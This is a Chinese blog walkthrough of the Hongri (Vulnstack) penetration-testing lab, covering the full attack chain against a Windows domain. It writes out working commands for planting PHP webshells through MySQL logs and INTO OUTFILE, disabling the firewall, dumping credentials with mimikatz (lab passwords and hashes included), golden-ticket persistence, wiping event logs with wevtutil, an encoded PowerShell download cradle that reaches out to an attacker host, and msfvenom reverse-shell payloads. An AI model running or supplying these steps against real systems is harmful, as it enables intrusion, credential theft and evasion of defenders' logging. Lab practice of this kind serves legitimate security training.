hongri1靶场通关笔记(多角度渗透测试)

红日靶场通关笔记

灵境项目地址:https://github.com/414aaj/LingJing

首先lingjing环境l配置

将vm虚拟网络配置桥接到lingjing路由上,然后来到设置

选择刚刚桥接号的虚拟网络即可

lingjing需要以管理员权限启动

首先拿到目标IP地址 192.242.168.244

Nmap扫描端口以及服务版本

nmap 192.242.168.244 -sV -A --sS -Pn --unprivileged

--unprivileged该命令主要是解决设备限制 主要是让nmap使用非特权模式

扫描结果如下

存活端口如下

80/tcp   open  http         Apache httpd 2.4.39 ((Win64) OpenSSL/1.1.1b mod_fcgid/2.
3.9a mod_log_rotate/1.02)
|_http-server-header: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_
rotate/1.02
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds
(workgroup: GOD)
1025/tcp open  msrpc        Microsoft Windows RPC
1026/tcp open  msrpc        Microsoft Windows RPC
1027/tcp open  msrpc        Microsoft Windows RPC
1028/tcp open  msrpc        Microsoft Windows RPC
1048/tcp open  msrpc        Microsoft Windows RPC
1051/tcp open  msrpc        Microsoft Windows RPC
3306/tcp open  mysql        MySQL (unauthorized)

访问80端口

有80端口,访问一下,是一个phpstudy探针

dirseach扫描网站目录

既然有80端口,可以尝试用dirseach扫一下网站目录

python dirsearch.py -u http://192.242.168.244

扫描结果如下

http://192.242.168.244/phpmyadmin/ChangeLog 没什么东西

http://192.242.168.244/phpmyadmin/README 发现php版本为5.2

http://192.242.168.244/phpinfo.php

http://192.242.168.244/phpMyAdmin/index.php phpmyadmin登录接口

尝试弱口令

root:123456

root:root

通过弱口令root:root成功进入

现在是只有mysql权限,既然进来了,就要想办法扩大危害,提升权限。

phpmyadmin提权思路

利用mysql日志提权

在phpmyadmin可以利用mysql日志文件写入shell进行getshell

set global general_log='on'

设置日志记录地址

set global general_log_file='C:/phpStudy_pro/WWW/shell.php';

植入webshell

SELECT '<?php eval($_POST[DY19sec]);?>'

蚁剑连接

http://靶机IP/shell.php

发现备份文件

利用慢查询提权

查看慢查询权限

show variables like '%slow%'

开启慢查询日志

set global slow_query_log=1;

设置慢查询日志路径

set global slow_query_log_file='C:/phpstudy_pro/WWW/shell.php';

注意踩坑点:路径设置需要/而不是\,否则保存日志路径是会没有\

查询 MySQL 中慢查询的判断阈值(单位为秒)
select @@long_query_time;

植入webshell

select'<?php @eval($_POST["DY19sec"]);?>'or sleep(11); 注意这里sleep的数值一定要大于阈值

成功延时,表示成功

蚁剑连接

一些mysql提权可能会用的操作

查看当前mysql路径

SHOW VARIABLES LIKE '%datadir%';

C:\phpstudy_pro\Extensions\MySQL5.7.26\

查看用户权限
select * from mysql.user; 

show global variables like "%secure%";      //查询secure_file_priv配置
SHOW VARIABLES LIKE '%datadir%';

secure_file_prive=null                      //不允许导入导出数据到目录
secure_file_priv=c:\DY19sec                   //允许导入导出数据到指定目录
secure_file_priv=""                         //允许导入导出数据到任意目录
secure_file_priv="/"                        //允许导入导出数据到任意目录
读取文件

SELECT load_file('/etc/passwd'); 读取系统文件。

查看当前用户有没有写入权限

SHOW VARIABLES LIKE 'secure_file_priv';

检查写入权限 若值为空,可写入任意目录;若为 /tmp/,仅限该目录

创建数据库和表写入webshell

条件

Root数据库用户(root权限);
网站绝对路径(确定有写入权限);
secure_file_priv没有具体值。

建库

建表

建字段

植入webshell

<?php eval($_POST[DY19sec]); ?>'

执行SQL查询,将该表中的内容导出到指定文件

select * from test_table into outfile "/phpstudy_pro/www/create_shell.php";

如上操作,SQL语句玩法

CREATE TABLE test( id text(500) not null);   
INSERT INTO test (id) VALUES('<?php @eval($_POST[cmd]);?>');
SELECT id FROM test INTO OUTFILE 'C:/phpstudy/WWW/1.php';
DROP TABLE IF EXISTS test;

into outfile写马

1.对web目录需要有写权限能够使用单引号

2.secure_file_priv 不为null 具体描述在下边。

3.要知道网站的绝对路径,写入马才能连接。

利用方法

先根据各种信息收集 判断或猜测出网站的绝对路径

比如 如果是 phpstudy启动的 根据 mysql 安装路径 就可以猜出网站的位置

如果是 linux 一般位于 /var/www/html

select @@basedir;  查找mysql安装路径
show global variables like '%secure_file_priv%';
select '<?php @eval($_POST[a]);?>'INTO OUTFILE '/var/www/html/shell.php'

查看当前系统用户权限

现在有了webshell可以进行下一步操作,查看当前系统用户权限

内网渗透

关闭目标靶机防火墙

先给靶机的防火墙关了

netsh advfirewall show allprofile state      查看防火墙状态

netsh advfirewall set allprofiles state off   关闭防火墙

Cobalt Strike 4.7 上线打法

首先在kali上给teamserverTeamServerImage执行权限

启动Cobalt Strike 4.7 服务端

./teamserver kali-ip 123456

然后再物理机上启动Cobalt Strike 4.7客户端

填上kali-IP 密码是123456

然后直接运行尝试访问http://192.168.15.129/a

然后通过蚁剑连接的后门上传,到终端运行c2后门即可

尝试在物理机上上线,没有问题

提权操作

如果不是system用户,这里可以提升权限

内网信息收集
shell ipconfig                                            //查看网络

shell net user                                           //查看本地用户

shell net view                                          //列举计算机名

shell net config Workstation                   //查看当前计算机名、域、登录域等信息

这里报错不知道什么原因

正常的如下

shell net view /domain                            //看看几个域 

端口扫描

结果如下

抓取明文密码

CS4.7内网横向

通过端口扫描操作

发现开了445端口

445端口smb协议,有个非常著名的MS17-010永恒之蓝漏洞

再cs4.7上创建监听器

切换攻击目标列表

点击如下图标

或其他版本cs点击如下

添加 用户名 密码 域名 -> 监听器 -> 对端连接的隧道

监听器选择我们刚刚创建的SMB监听器,对端连接的隧道选择system权限的

横向成功,进入域控,记得养成好习惯关防火墙

权限维持(黄金票据)

黄金票据是指能够绕过认证授权(Authentication and Authorization)机制并获得所需权限的票据。这种票据可以被攻击者收集和利用,从而从系统内部获取高权限,甚至完全控制系统。

抓取 Hash 还有明文密码

抓取hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:ad8b1b80e5d43bd61ab6796242bc7daa:::

抓取明文密码

Authentication Id : 0 ; 5328583 (00000000:00514ec7)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/9/5 13:33:59
SID               : S-1-5-18
	msv :	
	 [00000003] Primary
	 * Username : liukaifeng01
	 * Domain   : STU1
	 * LM       : edea194d76c77d875bab81ae20fa3c86
	 * NTLM     : ad8b1b80e5d43bd61ab6796242bc7daa
	 * SHA1     : ae185dd6f0857274ed77bab1eb981473ddd8c5fd
	tspkg :	
	 * Username : liukaifeng01
	 * Domain   : STU1
	 * Password : hongrisec@2025
	wdigest :	
	 * Username : liukaifeng01
	 * Domain   : STU1
	 * Password : hongrisec@2025
	kerberos :	
	 * Username : liukaifeng01
	 * Domain   : STU1
	 * Password : hongrisec@2025
	ssp :	
	credman :	

Authentication Id : 0 ; 5248672 (00000000:005016a0)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/9/5 13:28:55
SID               : S-1-5-18
	msv :	
	 [00000003] Primary
	 * Username : liukaifeng01
	 * Domain   : STU1
	 * NTLM     : ad8b1b80e5d43bd61ab6796242bc7daa
	tspkg :	
	 * Username : liukaifeng01
	 * Domain   : STU1
	 * Password : (null)
	wdigest :	
	 * Username : liukaifeng01
	 * Domain   : STU1
	 * Password : (null)
	kerberos :	
	 * Username : liukaifeng01
	 * Domain   : STU1
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 580372 (00000000:0008db14)
Session           : NetworkCleartext from 0
User Name         : liukaifeng01
Domain            : STU1
Logon Server      : STU1
Logon Time        : 2025/6/22 7:29:55
SID               : S-1-5-21-1982601180-2087634876-2293013296-1000
	msv :	
	 [00000003] Primary
	 * Username : liukaifeng01
	 * Domain   : STU1
	 * LM       : edea194d76c77d875bab81ae20fa3c86
	 * NTLM     : ad8b1b80e5d43bd61ab6796242bc7daa
	 * SHA1     : ae185dd6f0857274ed77bab1eb981473ddd8c5fd
	tspkg :	
	 * Username : liukaifeng01
	 * Domain   : STU1
	 * Password : hongrisec@2025
	wdigest :	
	 * Username : liukaifeng01
	 * Domain   : STU1
	 * Password : hongrisec@2025
	kerberos :	
	 * Username : liukaifeng01
	 * Domain   : STU1
	 * Password : hongrisec@2025
	ssp :	
	credman :	

Authentication Id : 0 ; 576344 (00000000:0008cb58)
Session           : Service from 0
User Name         : sshd_7568
Domain            : VIRTUAL USERS
Logon Server      : (null)
Logon Time        : 2025/6/22 7:29:45
SID               : S-1-5-111-3847866527-469524349-687026318-516638107-1125189541-7568
	msv :	
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 237997 (00000000:0003a1ad)
Session           : Interactive from 1
User Name         : Administrator
Domain            : GOD
Logon Server      : OWA
Logon Time        : 2025/6/22 7:22:32
SID               : S-1-5-21-2952760202-1353902439-2381784089-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : GOD
	 * LM       : edea194d76c77d875bab81ae20fa3c86
	 * NTLM     : ad8b1b80e5d43bd61ab6796242bc7daa
	 * SHA1     : ae185dd6f0857274ed77bab1eb981473ddd8c5fd
	tspkg :	
	 * Username : Administrator
	 * Domain   : GOD
	 * Password : hongrisec@2025
	wdigest :	
	 * Username : Administrator
	 * Domain   : GOD
	 * Password : hongrisec@2025
	kerberos :	
	 * Username : Administrator
	 * Domain   : GOD.ORG
	 * Password : hongrisec@2025
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/6/22 7:21:20
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : STU1$
Domain            : GOD
Logon Server      : (null)
Logon Time        : 2025/6/22 7:21:19
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : STU1$
	 * Domain   : GOD
	 * NTLM     : c047b43f8c376e43207b32fddf04a7aa
	 * SHA1     : 87cb2f266b8282d255189efba92c6d048261bae4
	tspkg :	
	wdigest :	
	 * Username : STU1$
	 * Domain   : GOD
	 * Password : 25 b0 52 77 d0 81 67 a4 68 cc 12 a0 c0 37 62 5d f8 6e bc 08 ac fc d2 93 eb 14 71 54 75 30 01 4e 9b 68 8b 5b e0 2d 26 b2 e1 07 da f2 9f c6 1b 84 25 37 f8 6f 3c ba 00 41 e3 e5 ee 95 9d 6c 39 ff 6d b6 6b 15 4e 41 e1 9c a9 15 a5 8d 92 66 3c f5 3a 84 ea e2 2b 8c b2 ce a2 7a 3d 6c 45 3f 4d 4e 08 ba a0 d3 4d bf 90 fd 5a 5f 64 49 81 18 e0 ed c4 c5 d5 0d b2 1d 09 3d e9 9c b0 f8 24 0a 8e e2 a8 81 a5 1f 19 46 21 d4 15 dc 71 97 59 90 b4 8b b4 d5 38 bb e7 e1 85 a3 04 63 ac ce 4b b4 7c a7 9a da 3b 8c fe 70 b7 9b eb f6 e9 ee 1e a5 27 79 2c 99 a4 c2 05 d1 d0 cd fc 84 8d 37 87 c8 76 ac f7 ab 35 4e 70 f1 75 38 fd 7c c9 a3 3a 30 f8 62 38 37 86 90 df 25 bc d9 fb f5 ae 21 0a 73 7a 10 21 9f e7 b5 ef 9c 94 05 b4 d8 74 2e 7c 12 9f 8b 
	kerberos :	
	 * Username : stu1$
	 * Domain   : GOD.ORG
	 * Password : 25 b0 52 77 d0 81 67 a4 68 cc 12 a0 c0 37 62 5d f8 6e bc 08 ac fc d2 93 eb 14 71 54 75 30 01 4e 9b 68 8b 5b e0 2d 26 b2 e1 07 da f2 9f c6 1b 84 25 37 f8 6f 3c ba 00 41 e3 e5 ee 95 9d 6c 39 ff 6d b6 6b 15 4e 41 e1 9c a9 15 a5 8d 92 66 3c f5 3a 84 ea e2 2b 8c b2 ce a2 7a 3d 6c 45 3f 4d 4e 08 ba a0 d3 4d bf 90 fd 5a 5f 64 49 81 18 e0 ed c4 c5 d5 0d b2 1d 09 3d e9 9c b0 f8 24 0a 8e e2 a8 81 a5 1f 19 46 21 d4 15 dc 71 97 59 90 b4 8b b4 d5 38 bb e7 e1 85 a3 04 63 ac ce 4b b4 7c a7 9a da 3b 8c fe 70 b7 9b eb f6 e9 ee 1e a5 27 79 2c 99 a4 c2 05 d1 d0 cd fc 84 8d 37 87 c8 76 ac f7 ab 35 4e 70 f1 75 38 fd 7c c9 a3 3a 30 f8 62 38 37 86 90 df 25 bc d9 fb f5 ae 21 0a 73 7a 10 21 9f e7 b5 ef 9c 94 05 b4 d8 74 2e 7c 12 9f 8b 
	ssp :	
	credman :	

Authentication Id : 0 ; 23884 (00000000:00005d4c)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/6/22 7:21:14
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : STU1$
	 * Domain   : GOD
	 * NTLM     : c047b43f8c376e43207b32fddf04a7aa
	 * SHA1     : 87cb2f266b8282d255189efba92c6d048261bae4
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : STU1$
Domain            : GOD
Logon Server      : (null)
Logon Time        : 2025/6/22 7:21:14
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : STU1$
	 * Domain   : GOD
	 * Password : 25 b0 52 77 d0 81 67 a4 68 cc 12 a0 c0 37 62 5d f8 6e bc 08 ac fc d2 93 eb 14 71 54 75 30 01 4e 9b 68 8b 5b e0 2d 26 b2 e1 07 da f2 9f c6 1b 84 25 37 f8 6f 3c ba 00 41 e3 e5 ee 95 9d 6c 39 ff 6d b6 6b 15 4e 41 e1 9c a9 15 a5 8d 92 66 3c f5 3a 84 ea e2 2b 8c b2 ce a2 7a 3d 6c 45 3f 4d 4e 08 ba a0 d3 4d bf 90 fd 5a 5f 64 49 81 18 e0 ed c4 c5 d5 0d b2 1d 09 3d e9 9c b0 f8 24 0a 8e e2 a8 81 a5 1f 19 46 21 d4 15 dc 71 97 59 90 b4 8b b4 d5 38 bb e7 e1 85 a3 04 63 ac ce 4b b4 7c a7 9a da 3b 8c fe 70 b7 9b eb f6 e9 ee 1e a5 27 79 2c 99 a4 c2 05 d1 d0 cd fc 84 8d 37 87 c8 76 ac f7 ab 35 4e 70 f1 75 38 fd 7c c9 a3 3a 30 f8 62 38 37 86 90 df 25 bc d9 fb f5 ae 21 0a 73 7a 10 21 9f e7 b5 ef 9c 94 05 b4 d8 74 2e 7c 12 9f 8b 
	kerberos :	
	 * Username : stu1$
	 * Domain   : GOD.ORG
	 * Password : 25 b0 52 77 d0 81 67 a4 68 cc 12 a0 c0 37 62 5d f8 6e bc 08 ac fc d2 93 eb 14 71 54 75 30 01 4e 9b 68 8b 5b e0 2d 26 b2 e1 07 da f2 9f c6 1b 84 25 37 f8 6f 3c ba 00 41 e3 e5 ee 95 9d 6c 39 ff 6d b6 6b 15 4e 41 e1 9c a9 15 a5 8d 92 66 3c f5 3a 84 ea e2 2b 8c b2 ce a2 7a 3d 6c 45 3f 4d 4e 08 ba a0 d3 4d bf 90 fd 5a 5f 64 49 81 18 e0 ed c4 c5 d5 0d b2 1d 09 3d e9 9c b0 f8 24 0a 8e e2 a8 81 a5 1f 19 46 21 d4 15 dc 71 97 59 90 b4 8b b4 d5 38 bb e7 e1 85 a3 04 63 ac ce 4b b4 7c a7 9a da 3b 8c fe 70 b7 9b eb f6 e9 ee 1e a5 27 79 2c 99 a4 c2 05 d1 d0 cd fc 84 8d 37 87 c8 76 ac f7 ab 35 4e 70 f1 75 38 fd 7c c9 a3 3a 30 f8 62 38 37 86 90 df 25 bc d9 fb f5 ae 21 0a 73 7a 10 21 9f e7 b5 ef 9c 94 05 b4 d8 74 2e 7c 12 9f 8b 
	ssp :	
	credman :

提取有用信息

Administrator:   31d6cfe0d16ae931b73c59d7e0c089c0
SID          :   S-1-5-18
Domain       :   GOD.ORG
黄金票据配置

将收集的信息填入(名字随便)

痕迹清除
shell wevtutil cl security    //清理安全日志
shell wevtutil cl system        //清理系统日志
shell wevtutil cl application        //清理应用程序日志
shell wevtutil cl "windows powershell"    //清除power shell日志
shell wevtutil cl Setup     //清除(cl)事件日志中的 "Setup" 事件。

MSF上线

powershell上线

对应模块use exploit/multi/script/web_delivery

msfconsole
use exploit/multi/script/web_delivery
set target 2 
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.242.168.252  需要攻击的目标地址
set lport 4444
run

生成出命令

powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABuAEcARAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsAaQBmACgAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUAByAG8AeAB5AF0AOgA6AEcAZQB0AEQAZQBmAGEAdQBsAHQAUAByAG8AeAB5ACgAKQAuAGEAZABkAHIAZQBzAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApAHsAJABuAEcARAAuAHAAcgBvAHgAeQA9AFsATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEcAZQB0AFMAeQBzAHQAZQBtAFcAZQBiAFAAcgBvAHgAeQAoACkAOwAkAG4ARwBEAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAyADQAMgAuADEANgA4AC4AMgA1ADIAOgA4ADAAOAAwAC8AVgBvAEoAVQB3AFgAdwBsAHAAaABJAGgASQBBAEIALwBwAFIATwBrAFUAMgBDAG4AaABaACcAKQApADsASQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADIANAAyAC4AMQA2ADgALgAyADUAMgA6ADgAMAA4ADAALwBWAG8ASgBVAHcAWAB3AGwAcABoAEkAaABJAEEAQgAnACkAKQA7AA==

然后拿到蚁剑的虚拟终端运行即可msf上线,如果没有,那就再蚁剑终端随便几条命令

msf木马上线

对应模块

use exploit/multi/handler  
反向木马制作
msfvenom -p windows/meterpreter/reverse_tcp LHOST=< Your_kali IP> LPORT=< Your_kai Port> -f exe > shell.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=< Your_kali IP> LPORT=< Your_kai Port> -f exe > shell.exe

msfvenom -p php/meterpreter_reverse_tcp LHOST=< Your_kali IP> LPORT=< Your_kali Port> -f raw > shell.php

msfvenom -p windows/meterpreter/reverse_tcp LHOST=< Your_kali IP> LPORT=< Your_kali Port> -f asp > shell.asp

msfvenom -p java/jsp_shell_reverse_tcp LHOST=< Your_kali IP> LPORT=< Your_kali Port> -f raw > shell.jsp

msfvenom -p cmd/unix/reverse_python LHOST=< Your_kali IP> LPORT=< Your_kali Port> -f raw > shell.py

msfvenom -p cmd/unix/reverse_bash LHOST=< Your_kali IP> LPORT=< Your_kali Port> -f raw > shell.sh

msfvenom -p cmd/unix/reverse_perl LHOST=< Your_kali IP> LPORT=< Your_kali Port> -f raw > shell.pl
msf开启监听,肉鸡执行反向木马上线
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp   //使用正向shell模块
set lhost < Your_kali IP>                     //设置目标靶机
set lport < Your_kali PORT>                   //监听端口
show options                                  //查看配置
run                                       //攻击
MSF派生CS

CS创建个监听器配置如下

background 将MSF拿到的shell会话放后台

接着调用payload_inject模块

use exploit/windows/local/payload_inject

设置HTTPS Payload

set payload windows/meterpreter/reverse_https

设置lhost与lport为CS的监听器的IP与端口

set lhost CS服务端IP
set lport 5555

设置DisablePyaloadHandler为True,这个选项会让MSF避免在其内起一个handler来服务你的payload连接,就是告诉MSF我们已经建立了监听器,不需要再新建监听器了

set DisablePayloadHandler True

设置PrependMigrate为True,这个设置让MSF前置的shellcode在另一个进程当中运行payload stager,如果被利用的应用程序奔溃或者被用户关闭,这个会帮助Beacon会话存活。

set PrependMigrate True

设置当前会话

set session 1

开始传递会话

exploit
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值